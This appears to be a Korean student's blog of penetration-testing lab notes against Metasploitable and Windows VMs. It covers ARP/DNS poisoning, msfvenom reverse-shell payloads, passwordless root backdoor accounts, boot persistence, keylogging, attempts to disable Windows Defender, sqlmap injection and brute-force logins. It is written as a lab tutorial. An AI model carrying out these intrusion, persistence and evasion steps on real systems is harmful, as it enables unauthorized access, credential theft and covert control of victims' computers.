0HP

MITM

Pulseeee — Fri, 17 Feb 2023 17:46:47 +0900

Ettercap (ARP, DNS) 을 이용한

ARP Poisoning

DNS Poisoning 공격

목표 : 공격 대상자가 외부에게 전송된 패킷이 Gateway를 통과하기 전 공격자가 중간에 개입하여 패킷이 공격자를 통해 패킷이 Gateway로 내보내지고 Gateway에서 들어온 응답을 공격자를 거쳐 공격 대상자 에게 보내지게 한다.

구분	운영체제	IP주소
공격 대상자	Windows 10	192.168.0.20
공격 대상자		192.168.0.1
공격자	칼리리눅스 2022.04	192.168.0.29

CentOS7 ns1의 DNS를 CentOS7 ns1의 IP주소로 바꾼다.

칼리 리눅스 etter.dns 파일은 DNS응답 IP를 조작하기 위해 사DNS spisoning에 사용된다. 조작할 내용을 추가한다.

게이트웨이와 리눅스의 mac주소를 칼리리눅스의 mac주소로 바꿔야하기 때문에 타겟으로 지정해준다.

ARP poisoning 공격을 실행한다.

공격자인 칼리 리눅스의 mac주소는 00:50:56:07:02:93이다.

게이트웨이의 mac주소가 칼리리눅스의 mac주소로 바뀐것을 확인할 수 있다.

Manage plugins를 클릭하여 dns_spoof를 더블 클릭하여 응답을 조작하기 위한 파일을 적용 시킨다.

공격 대상자 PC에서 질의를 했을때 오염된 정보가 돌아 오는 것을 확인 할 수 있다.

Unshadow

Pulseeee — Wed, 15 Feb 2023 14:25:51 +0900

침투하여 추출해온 passwd와 shadow 파일을 unshadow명령어를 이용하여 unshadow가 가능하다.

파이썬을 이용한 unshadow

>>> import os
>>> import re
>>> file = open('shadow', 'r')
>>> shadow = file.read().rstrip().split('\n')
>>> file.close()
>>> file = open('passwd', 'r')
>>> passwd = file.read().rstrip().split('\n')
>>> file.close()
>>> passwd2 = {}
>>> for row in passwd:
...     words = row.split(':')
...     passwd2[words[0]] = words[1]
>>> shadow2 = {}
>>> for row in shadow:
...     words = row.split(':')
...     shadow2[words[0]] = words[1]
>>> unshadowed_passwd = ""
>>> for user, value in passwd2.items():
...     value[0] = shadow2[user]
...     text = ":".join(value)
...     unshadowed_passwd += user + ":" + text + "\n"
...
>>> file = open ("unshadowed_passwd", "w")
>>> file.write(unshadowed_passwd)
2093
>>>
>>> file.close()

악성 코드를 이용한 리눅스 침투

Pulseeee — Wed, 15 Feb 2023 11:44:43 +0900

구분	운영체제	IP 주소	비고
공격 대상자	Metasploitable	192.168.0.23	게스트 OS
공격자	Kali Linux 2022.4	192.168.0.29	게스트 OS

--arch=x86 (아키텍처 32bit)
--paltform=linux (linux운영체제)
--format=elf (linux운영체제에서 사용하는 확장자)
--payload=linux/x86/meterpreter_reverse_tcp (악성 코드 종류)

리눅스에서 사용할 악성 코드 생성

모든 퍼미션에 x값을 넣어준다.

자동 실행 스크립트를 만들어 준다.

공격 대상자 리눅스에서 악성 코드 실행 파일을 ftp로 다운받는다.

다운 받은 악성 코드파일에 퍼미션x 가 사라져서 x를 추가하고 실행한다.

공격 대상자에서 악성코드를 실행하면 미터프리터 환경을 획득 하는 것을 확인 할 수 있다.

1. 기존 계정의 유저명/ 해쉬암호 추출

이제 침투한 공격 대상자 리눅스의 유저명과 암호를 추출해본다.

run post/linux/gather/hashdump 명령을 이용하여 해시값과 계정명을 추출한다.

2. 백도어 계정(UID 0), 암호가 없어야함

공격 대상자 리눅스의 shell로 접근하여 UID0, GUID가 root인 백도어 계정을 만들고 계정을 unlock한다.

echo 명령으로도 백도어 계정을 만들수 있다.

공격 대상자에서 확인해본 결과 암호가 없는 uid0, gui0인 백도어계정2개가 생성된것을 확인 할 수 있다.

3. SetUID (vi -> vi2)로 설정

미터프리터 환경에서 cp와 chmod 명령어를 이용하여 vi를 복제한 후 SetUID로 설정한다.

런레벨	의미
init 0	시스템종료 (Default X)
init 1	Single user (Network 비활성화,시스템 복구모드)
init 2	Multi user (Network 비활성화)
init 3	Multi user (Network 활성화, CLI모드)
init 4	Unused (reversed,CLI모드, 따로 사용하라고 만들어 높은 모드)
init 5	Multi user + X Windows (Network 활성화, GUI모드)
init 6	재부팅 (Default X)

알파벳이나 숫자가 낮을 수록 런레벨을 실행 하였을 때 우선순위가 높다.

현재 rc3로 동작하는 공격 대상자 리눅스의 부팅시 실행되는 순위이다. login전 S91과 S99사이에 악성 코드를 심어 준다.

metsploitable은 rc3로 동작한다. wget명령으로 침투한 리눅스에 악성 코드 파일을 rc3.d디렉토리에 다운받아 준다.

잘 다운받되었는지 확인하고 퍼미션을 a+x, 이름을 S95hack 변경한다. 공격 대상자 를 리부트 하고 공격자 칼리눅스에서 대기를 했지만 반응이 없었다.

다시 악성 코드 파일을 /bin 디렉토리로 옮겨주고 /etc/rc.local 파일에 해당 악성 코드 파일의 위치와 nohup과 & 옵션을 붙여 저장하고 리부트 해준다.

성공적으로 부팅시 악성 코드가 자동으로 실행되었다.

악성 코드를 이용한 침투

Pulseeee — Wed, 15 Feb 2023 09:33:36 +0900

공격대상자 사용자의 실수로 침투가 가능하다.

특정한 취약점이 없어도 사용자가 악성 코드를 실행함으로써 침투가 가능해진다. 악성 코드를 공격 대상자 몰래 설치하고 공격 대상자 스스로 실행하기 까지 일련의 과정이 필요하다.

구분	운영체제	IP 주소	비고
공격 대상자	Windows 10	192.168.0.20	호스트 OS
공격자	칼리리눅스 2022.4	192.168.0.29	게스트 OS

msfvenom 명령어를 이용하여 악성 코드를 생성한다.

msfvenom payload (File) -> 배포

공격자 공격 대상자

(사용자의 실수)

IP주소 <---reverse_tcp(역방향)-------

Port번호

--arch CPU종류(32bit, 64bit)

--platform O/S(Windows, Linux, Android, Mac)

--format 실행 파일 형식 (exe, elf, ...)

--payload platform/payload/reverse_tcp

--encoders Enscryption (숨기는 기능)

exploit 구문이 없고 payload 구문만 있다. 공격자의 주소 정보는 있지만 공격 대새장자의 IP주소가 없다. 블툭정 다수를 대상으로 사용하기 때문에 공격 대상자의 IP주소 설정을 생략한다. windows/meterpreter/reverse_tcp 구문에서와 같이 공격 대상자가 윈도우 기반의 악성 코드를 실행하면 공격자는 역방향 접속에 의해 미터프리터 환경을 획득할 수 있다. -f c는 C언어 형식의 코드를 생성하라는 의미이다. 생성한 악성 코드는 32비트 기반의 크기는 345바이트이다. 최종 파일의 크기는 1518바이트이다. unsigned char buf[] 배열에 들어간 코드는 쉘코드로 유닉스/리눅스의 쉘 환경에서 실행하는 기계어를 의미한다.

윈도우 기반의 페이로드 생성

공격 대상자 컴퓨터에 악성 코드를 ftp를 이용하여 다운받아 주고 칼리리눅스에서 자동 스크립트를 만들어 준다.

msfconsole -r 스크립트파일을 실행하면 바로 대기상태로 진입한다.

ftp를 다운 받은 악성 코드를 관리자 권한으로 실행한다.

악성코드가 실행되면 msfconsole이 반응하여 미터프리터 환경으로 넘어가지고 공격 대상자에서 사용중인 계정 정보와 비밀번호를 획득할 수 있다.

백도어 설치, 키로그설치

윈도우 작업관리자 프로세스 항목을 알 수 있다.

explorer.exe프로그램에 malware.exe를 migrate하여 윈도우 작업관리자상에 malware.exe가 explorer.exe로 이주하여 보여지지 않게 된다.

윈도우 화면을 캡처할 수 있다.

윈도우에서 키보드 조작또한 로그로 남겨서 확인이 가능하다.

칼리리눅스에있는 파일을 윈도우로 업로드 할 수 있다.

(C:\Users\st01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) 공격대상자 PC에 사용자 시작프로그램 디렉토리로 이동하여 악성코드를 바로 실행할 프로그램을 바로가기 추가해 준다.

윈도우 디펜더 비활성화

1. 윈도우키 + R 실행하여 regedit을 입력하여 레스트리 편집기를 실행한다.

Windows Defender폴더를 클릭하고 오른쪽 화면을 오른쪽 클릭 새로만들기 DWORD(32비트)로 만들고 값을 1로 설정하고 이름은 DisableAntiSpyware로 해준다.

생성한 레지스트리를 밖으로 내보기하고 삭제하고 재부팅 해준다.

재부팅결과 디펜더가 비활성화가 되지않아 로컬 그룹 정책 편집기를 사용한다.

윈도우 디펜더 비활성화

2. 로컬 그룹 정책 편집기

로컬 그룹 정책 편집기에서 디펜더 바이러스 백신 끄기 사용으로 체크하여 적용해주고 재부팅 해준다.

재부팅 결과 사용체크가 풀려서 사용하지 못하였다.

실행파일을 이용한 악성코드 침투

실행파일에 악성 코드를 삽입하여 실행파일을 만들어 준다.

ftp를 이용하여 공격자 PC에서 악성코드가 담긴 실행파일을 다운받는다.

공격 대상자 PC에서 해당 실행파일을 실행하면 미터프리터환경이 연결된다. 이때 관리자 권한으로 실행을 하지 않아 hashdump명령어는 사용하지 못한다.

DVWA blind injection

Pulseeee — Mon, 13 Feb 2023 11:33:24 +0900

SQL Injection(Blind) 항목을 클릭한 뒤 10 입력한다.

tcpdump 도구를 이용하여 해쉬 정보를 추출하고 따로 기억한다.

\SQLMap은 파이썬 언어로 작성한 SQL 삽입 취약점 점검 도구로서 모의 침투 수행 시 필수적인 도구중 하나이다. 추출한 쿠기 정보를 이용하여 기본 문구를 작성하고 끝에 --banner를 적어 배너 정보를 획득한다.

맨끝에 --dbs를 입력하여 mysql에서 show databases;명령어를 통해 나오는 같은 정보를 출력하여 정보를 획득한다.

추출 과정을 자세히 보면 쿼리문을 만들어서 자동으로 검색이 되게 하는것이 보인다. id=10' or not 8667=8667문구를 통해 모두 거짓으로 만들고 에러가 발생했을때 다음 구문으로 이동하여 id=10' or row(3904, 8047)를 참으로 만들어서 찾고자 하는 내용을 찾을 수 있게 한다.

MySQL에서 show databases; 명령어를 검색 하였을때

table정보를 획득한다.

users 테이블의 스키마를 확인할 수 있다.

do you want to store hashes to a temporary file for eventual further processing with other tools

(다른 도구를 사용하여 최종적으로 추가 처리할 수 있도록 임시 파일에 해시를 저장하시겠습니까라는 문구가 나오는데 N를 해준다)

do you want to crack them via a dictionary-based attack?

(사전에 기반한 공격을 통해 해독을 하겠습니까 문구에는 Y를 해준다.)

자동으로 blind injection 공격을 통해 해당 데이터베이스의 계정정보, 패스워드, 스키마, 테이블구조, 데이터베이스의 정보를 획득 할 수 있다.

MySQL 정보 수집

Pulseeee — Fri, 10 Feb 2023 12:57:39 +0900

서버를 침투하기 전 사전의 준비가 필요하다.

먼저 root을 탈취하기 위한 무한대입공격, 해쉬덤프를 이용한 암호해독 그리고 버전 정보 획득 등이 있다.

버전 정보 획득

버전 정보를 획득하여 무한 대입 공격으로 root계정의 비밀번호를 획득한다.

인증 정보에 기반하여 MySQL 서버에 저장된 스키마와 해쉬ㅏ 정보 등을 출력한다.

해쉬 정보도 출력 시킬 수 있다.

MySQL 해쉬정보를 출력시킨 결과이다.

/root/.msf4/loot 디렉토리에 txt파일로 출력된 정보가 저장된다.

unreal_ircd_3281_backdoor.rb 모듈을 이용한 침투

Pulseeee — Fri, 10 Feb 2023 11:24:17 +0900

unreal_ircd_3281_backdoor.rb 모듈을 이용한 침투

해당 모듈은 osvdb-65445/cve-2015-2075 취약점에 기반함 침투 모듈이다.

UnrealIRCd에 트로이 목마 기반의 악성코드를 삽입해 공격자가 원격에서 악성 코드를 실행시킬 수 있다.

IRC란 실시간 채팅 프로토콜이고 UnrealIRCd란 오픈 소스 IRC 데몬을 의미힌다. 해당 취약점은 UnrealIRCd 3.2.8.1버전에서 실행할 수 있다고 알려졌다.

UnrealIRCd 포트가 개방되어 있는지 스캔한다.

침투 모듈을 이용하여 침투 하였다.

iptables

INPUT(incoming) DROP

	Source	Destination	protocol
ssh ( tcp, 22)	192.168.0.0/24	192.168.0.23	tcp, 80
http ( tcp, 80)	any(0.0.0.0/0)	192.168.0.23	tcp, 80
irc ( tcp, 6667)	any(0.0.0.0/0)	192.168.0.23	tcp, 6667

tcp port 추가와 DROP 정책으로 변경

DROP 정책으로 PING이 되지 않는다.

icmp 프로토콜을 accept해주면 ping이 보내 진다.

OUTPUT으로 내보낸적이 있던것은 유지 하겠다는 설정

iptables의 INPUT DROP 설정으로 6667포트를 뚫고 침투할수가 없어 연결이 되지 않는 것을 확인 할 수 있다.

역방향으로 공격대상자가 공격자에게 익숙한 https포트인 443포트로 접근하게 하여 침투에 성공 하였다.

공격대상 웹서버의 계정을 탈취하여 역방향 침투

OUTPUT(outgoing) ACCEP


ssh ( tcp, 22)	192.168.0.23
http ( tcp, 80)	192.168.0.23
irc ( tcp, 6667)	192.168.0.23

유닉스/리눅스 기반의 운영체제 침투

Pulseeee — Thu, 9 Feb 2023 10:57:28 +0900

유닉스/리눅스 기반의 운영체제 침투

Kali Linux -> Metasploitable

ms02-058 Microsoft 2002-058
cve-2xxx-xxxx Global Application 2xxx-xxxx

취약점이 발견된 것을 cve-2xxx-xxxx 형태로  (cve_2022_33891) 작성된다.

osvdb OpenSource

mfconsole에서 search 명령어를 이용하여 apache의 취약점을 확인할 수 있다.

search ip로 해당 ip를 사용하는 pc의 스캔 결과를 알수 있다.

구분	운영체제 종류	IP	비고
공격 대상자	메타스플로잇터블 2.8	192.168.0.23	게스트 OS
공격자	칼리 리눅스 2022.4	1925.168.0.29	게스트 OS

포트가 닫혀 있는 것을 ICMP가 알려준다.

개방되어있는 distccd에대해 search명령어로 취약점을 확인한다.

exploit은 취약점을 뚫고 들어가는것이고 / payload는 뚫고 들어가서 악성코드를 심는 것이다.

set payload cmd/unix/bind_ruby (방화벽이 열려있을때 사용)

set payload cmd/unix/reverse_ruby (방화벽이 닫혀있을때 사용, 공격 대상자가 공격자에게 접근을 유도한다.)

공격 대상의 shell환경에 침투 하였다.

제한적이지만 공격대상자의 pc를 조작할 수 있다.

공격 대상자 PC에서 netstat명령어로 사용중인 port를 확인하여 의심가는 port로 침해가 되었는지 확인할 수 있다.

meterpreter

ctlr + z 로 전에 shell 침투를 백그라운드로 보내고 meterpreter환경을 실행한다.

shell_to_meterpreter는 일종의 악종코드인데 사전에 준비된 세션에 적용 시킬 수 있다.

session2가 만들어 졌다.

sessions 2를 입력하여 meterpreter 사용 한다.

?를 입력하여 사용법을 알 수 있다.

l이 붙은 명령어는 local컴퓨터를 조작하는 명령어이다.

Kali(Local) Metaploitable(Remote)

ls ->

<- lls

<- lcd

cd ->

arp (Address Resolution Protocol) : 주소 해결 프로토콜

IP Address Mac Address

session을 나올땐 exit를 하고 깨끗한 환경에서 다시 사용하기 위해 back과 exit -y로 msfconsole을 종료해준다.

usermap_script.rb 모듈을 이용한 침투

해당 모듈은 osvdb-34700/cve-2007-1547 취약점에 기반한 침투 모듈이다. 삼바에서 발생한 구조적 속성을 악용해 공격자가 원격에서 악성 코드를 실행시킬 수 있다. 해당 취약점은 삼바 3.0.20 버전에서 3.0.25rc3 버전까지 실행이 가능하다고 알려졌다.

usermap_script.rb 모듈 정보

정방향(방화벽이 열려있을때)

msf6 > use exploit/취약점 모듈

msf6 exploit(취약점모듈) > use payload 악성코드/bind_ruby or bind_tcp

msf6 exploit(취약점모듈) > set rhost 공격대상자ip

msf6 exploit(취약점모듈) > exploit

역방향(방화벽이 닫혀있을때)

msf6 > use exploit/취약점 모듈

msf6 exploit(취약점 모듈) > use payload 악성코드/reverse_ruby or reverse_tcp

msf6 exploit(취약점 모듈) > set rhost 공격대상자ip

msf6 exploit(취약점 모듈) > set lhost 공격자ip

msf6 exploit(취약점 모듈) > set lport 공격자port번호

msf6 exploit(취약점모듈) > exploit

root계정을 탈취하여 침투에 성공 하였다.

echo를 이용하여 cat > /etc/passwd에 입력해주면 계정이 생성된다.

공격자 pc에서도 echo를 실행했을때 적용이 되는 것을 확인할 수 있다. 침투에 사용할 hack계정을 passwd파일에 입력하여 생성하고 hack의 비밀번호를 ::로 설정하여 shadow파일에 입력한다.

공격자 pc를 하나더 실행하여 텔넷으로 공격대상pc를 텔넷으로 접근하면 echo로 생성한 hack 계정으로 비밀번호 없이 침투가 가능하고 root계정을 탈취하였다.

미터프리터 방식

session1 백그라운드로 옮기고 미터프리터를 실행하여 session1을 이용하여 session2 미터프리터 환경을 획득한다.

비밀번호를 파일로 저장해 준다.

공격대상에서 사용한 유저의 명령어기록을 파일형태로 저장해 준다.

.msf4/loot 디렉토리에 저장된다.

john 명령어를 이용하여 해쉬값을 풀어서 보여준다.

msfconsole - brute Force attack

Pulseeee — Wed, 8 Feb 2023 19:31:28 +0900

대상 PC - Metasploitable2 : 192.168.0.23

공격 PC - Kail Linux 2022.4 : 192.168.0.29

모의 해킹 공격을 하기 전 공격 대상 PC에서 sudo 명령어를 사용할 수 있는 계정과 그룹을 확인한다.

admin 그룹과 이름이 루트인 계정은 sudo 사용 가능

대상 PC에서

admin1 / 1234 (sudo)
user2 / 2222
sales3 / 4545 계정을 생성한다.

admin1계정을 admin그룹으로 지정해준다.

metasploitable의 경우 user를 새로 생성하게 되면 홈 디렉토리가 생성이 되지 않는 문제가 생겼다.

홈 디렉토리의 안에 필요한 파일이 들어있는 skel을 복사하여 admin1의 소유로 바꿔준다.

브루트포스 공격을 하기 위하여 칼리리눅스에 공격 대상 linux에서 생성한 유저 명과 패스워드를 넣은 텍스트 파일을 칼리리눅스에 생성한다.

Mysql 계정도 설정해준다.

DataBase
root@% / 1234
user5@% / 6789
create user 'user5'@'%' identified by '6789';
update user set password = password('1234') where user = 'root';

공격을 시도하기 위해 msfconsole을 실행한다.

공격하기 전 공격 대상의 리눅스의 포트를 스캔한다.

use auxiliary/scanner/ftp/ftp_login 을 입력하고 공격 대상의 ip, ftp의 포트넘버, 무한대입 공격을 위한 유저명과 패스워드가 들어있는 텍스트파일을 지정하고 횟수를 256번, 공격이 성공해도 멈추지 않게 설정한후에 run으로 공격을 실행해주었다.

ftp포트로 공격을 시도한 결과 admin1, user2, sales3의 계정로그인이 성공하였다.

telnet 공격 시도

ssh 공격 시도

mysql 공격 시도

creds 명령어로 공격 결과를 확인할 수 있다.

msfconsole와 모의 해킹 프로세스

Pulseeee — Wed, 8 Feb 2023 19:24:17 +0900

msfconsole

1. Metasploit : CVE 넘버링이 붙은 알려진 취약점 공격을 사용할 수 있도록 제공되는 도구로 해킹을 편하게 하도록 도와주는 모의해킹 테스트 도구이다.

※ CVE : Common Vulnerabilities and Exposure 공개적으로 알려진 소프트웨어 보안 취약점을 가리키는 고유 표기이다.

2. 특징

1) 정보 수집, 공격(Exploit), 공격에 사용되는 Plugin(payload) 등으로 구성된 도구

2) 외부 모듈인 취약점 점검, 포트 스캐너 등의 사용이 가능하고 DB저장이 가능

3) 정보 수집 및 공격 모듈 사용 시 간편하게 진행 가능

4) msfconsole 내에서 외부 명령어(리눅스 명령어) 사용 가능

5) 리눅스에서 실행하는 공격 툴 관련 싱행 내용들을 Metaploit에서 실행하여 결과를 저장 가능

모의 해킹 프로세스

모의 해킹 프로세스의 단계로는

0. 사전협의 단계
1. 정보수집 단계
2. 취약점분석 단계
3. 침투 단계
4. 대응방안 수입, 보고서 작성 로 나누어 진다.

정보 수집 단계는 수동적인 정보 수집과 능동적인 정보 수집으로 나누어 진다.

수동적인 정보 수집은 구글, 네이버 등과 같은 검색으로 정보를 수집한다.

능동적인 정보 수집은 DNS 정보 조회(dig 또는 칼리리눅스를 사용), Host 정보 조회, Network (L3, L4 Port)정보를 수집한다.

칼리리눅스 nmap 명령어를 이용하여 공격 대상 PC의 포트 개방 여부 OS, 프로토콜의 버전등의 정보수집을 할 수 있다.

ex) nmap [옵션] [포트번호] [공격 대상 IP]

옵션 : -p (조회할 포트번호) -sT (TCP포트), -sU (UDP포트), -sV (버전정보), -O (공격 대상 PC의 OS정보), --reason(질의응답)

--reason 옵션으로 7계층의 open여부를 확인 할 수 있다.

프로토콜의 버전 정보 출력

OS 출력